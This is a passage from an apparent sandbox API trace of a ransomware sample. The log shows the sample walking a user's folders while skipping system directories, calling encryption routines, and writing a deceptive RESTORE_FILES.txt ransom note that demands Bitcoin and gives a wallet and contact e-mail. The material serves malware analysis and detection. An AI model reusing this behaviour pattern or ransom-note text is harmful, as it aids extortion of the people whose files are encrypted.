files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0090.086] WriteFile (in: hFile=0x14c, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e7b4*=0x53d, lpOverlapped=0x0) returned 1 [0090.086] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0090.086] WriteFile (in: hFile=0x14c, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e7b4*=0x2ac, lpOverlapped=0x0) returned 1 [0090.086] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0090.087] WriteFile (in: hFile=0x14c, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e7b4*=0xb1, lpOverlapped=0x0) returned 1 [0090.087] CloseHandle (hObject=0x14c) returned 1 [0090.088] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0090.088] lstrcmpiW (lpString1="UserData", lpString2="Windows") returned -1 [0090.088] lstrcmpiW (lpString1="UserData", lpString2="Program Files") returned 1 [0090.088] lstrcmpiW (lpString1="UserData", lpString2="Program Files (x86)") returned 1 [0090.088] lstrcmpiW (lpString1="UserData", lpString2="$Recycle.bin") returned 1 [0090.088] lstrcmpiW (lpString1="UserData", lpString2="System Volume Information") returned 1 [0090.088] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData") returned 86 [0090.088] lstrcmpW (lpString1="UserData", lpString2=".") returned 1 [0090.088] lstrcmpW (lpString1="UserData", lpString2="..") returned 1 [0090.088] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\*") returned 88 [0090.088] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\*", lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0x47ba90 [0090.088] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0090.088] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0090.088] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0090.088] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0090.088] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0090.088] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\.") returned 88 [0090.089] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0090.089] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0090.089] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0090.089] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0090.089] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0090.089] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0090.089] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0090.089] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\..") returned 89 [0090.089] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0090.089] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0090.089] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0090.089] lstrcmpiW (lpString1="Low", lpString2="Windows") returned -1 [0090.089] lstrcmpiW (lpString1="Low", lpString2="Program Files") returned -1 [0090.089] lstrcmpiW (lpString1="Low", lpString2="Program Files (x86)") returned -1 [0090.089] lstrcmpiW (lpString1="Low", lpString2="$Recycle.bin") returned 1 [0090.089] lstrcmpiW (lpString1="Low", lpString2="System Volume Information") returned -1 [0090.089] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low") returned 90 [0090.089] lstrcmpW (lpString1="Low", lpString2=".") returned 1 [0090.089] lstrcmpW (lpString1="Low", lpString2="..") returned 1 [0090.090] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\*") returned 92 [0090.090] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\*", lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0x47bad0 [0090.090] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0090.090] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0090.090] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0090.090] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0090.090] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0090.090] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\.") returned 92 [0090.090] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0090.090] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0090.090] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0090.090] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0090.090] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0090.090] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\userdata\\low\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0090.090] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0090.090] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0090.090] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0090.090] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0090.090] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0090.090] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0090.090] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\..") returned 93 [0090.090] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0090.090] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0090.090] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0090.090] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0090.090] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0090.090] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0090.090] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\.." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\userdata"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0090.090] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0090.090] lstrcmpiW (lpString1="65UX3YG0", lpString2="Windows") returned -1 [0090.091] lstrcmpiW (lpString1="65UX3YG0", lpString2="Program Files") returned -1 [0090.091] lstrcmpiW (lpString1="65UX3YG0", lpString2="Program Files (x86)") returned -1 [0090.091] lstrcmpiW (lpString1="65UX3YG0", lpString2="$Recycle.bin") returned 1 [0090.091] lstrcmpiW (lpString1="65UX3YG0", lpString2="System Volume Information") returned -1 [0090.091] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\65UX3YG0") returned 99 [0090.091] lstrcmpW (lpString1="65UX3YG0", lpString2=".") returned 1 [0090.091] lstrcmpW (lpString1="65UX3YG0", lpString2="..") returned 1 [0090.091] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\65UX3YG0\\*") returned 101 [0090.091] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\65UX3YG0\\*", lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 0x47bb10 [0090.091] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0090.091] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0090.091] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0090.091] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0090.091] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0090.091] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\65UX3YG0\\.") returned 101 [0090.091] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0090.091] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0090.091] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0090.091] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0090.091] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0090.091] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\65UX3YG0\\." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\userdata\\low\\65ux3yg0\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0090.091] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0090.091] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0090.091] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0090.091] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0090.091] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0090.091] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0090.092] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\65UX3YG0\\..") returned 102 [0090.092] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0090.092] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0090.092] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0090.092] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0090.092] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0090.092] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0090.092] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\65UX3YG0\\.." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\userdata\\low"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0090.092] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 0 [0090.092] FindClose (in: hFindFile=0x47bb10 | out: hFindFile=0x47bb10) returned 1 [0090.092] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\65UX3YG0\\RESTORE_FILES.txt") returned 117 [0090.092] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\65UX3YG0\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\userdata\\low\\65ux3yg0\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0090.093] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0090.093] WriteFile (in: hFile=0x154, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e2d4*=0x53d, lpOverlapped=0x0) returned 1 [0090.093] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0090.093] WriteFile (in: hFile=0x154, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e2d4*=0x2ac, lpOverlapped=0x0) returned 1 [0090.093] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0090.093] WriteFile (in: hFile=0x154, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e2d4*=0xb1, lpOverlapped=0x0) returned 1 [0090.093] CloseHandle (hObject=0x154) returned 1 [0090.093] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0090.093] lstrcmpiW (lpString1="AY721QDR", lpString2="Windows") returned -1 [0090.093] lstrcmpiW (lpString1="AY721QDR", lpString2="Program Files") returned -1 [0090.094] lstrcmpiW (lpString1="AY721QDR", lpString2="Program Files (x86)") returned -1 [0090.094] lstrcmpiW (lpString1="AY721QDR", lpString2="$Recycle.bin") returned 1 [0090.094] lstrcmpiW (lpString1="AY721QDR", lpString2="System Volume Information") returned -1 [0090.094] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\AY721QDR") returned 99 [0090.094] lstrcmpW (lpString1="AY721QDR", lpString2=".") returned 1 [0090.094] lstrcmpW (lpString1="AY721QDR", lpString2="..") returned 1 [0090.094] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\AY721QDR\\*") returned 101 [0090.094] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\AY721QDR\\*", lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 0x47bb10 [0090.094] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0090.094] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0090.094] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0090.094] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0090.094] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0090.094] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\AY721QDR\\.") returned 101 [0090.094] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0090.094] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0090.094] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0090.094] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0090.094] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0090.094] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\AY721QDR\\." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\userdata\\low\\ay721qdr\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0090.094] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0090.094] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0090.094] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0090.094] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0090.094] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0090.094] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0090.094] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\AY721QDR\\..") returned 102 [0090.094] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0090.094] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0090.094] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0090.094] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0090.094] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0090.094] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0090.094] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\AY721QDR\\.." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\userdata\\low"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0090.095] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 0 [0090.095] FindClose (in: hFindFile=0x47bb10 | out: hFindFile=0x47bb10) returned 1 [0090.095] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\AY721QDR\\RESTORE_FILES.txt") returned 117 [0090.095] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\AY721QDR\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\userdata\\low\\ay721qdr\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0090.095] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0090.095] WriteFile (in: hFile=0x154, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e2d4*=0x53d, lpOverlapped=0x0) returned 1 [0090.096] lstrlenA 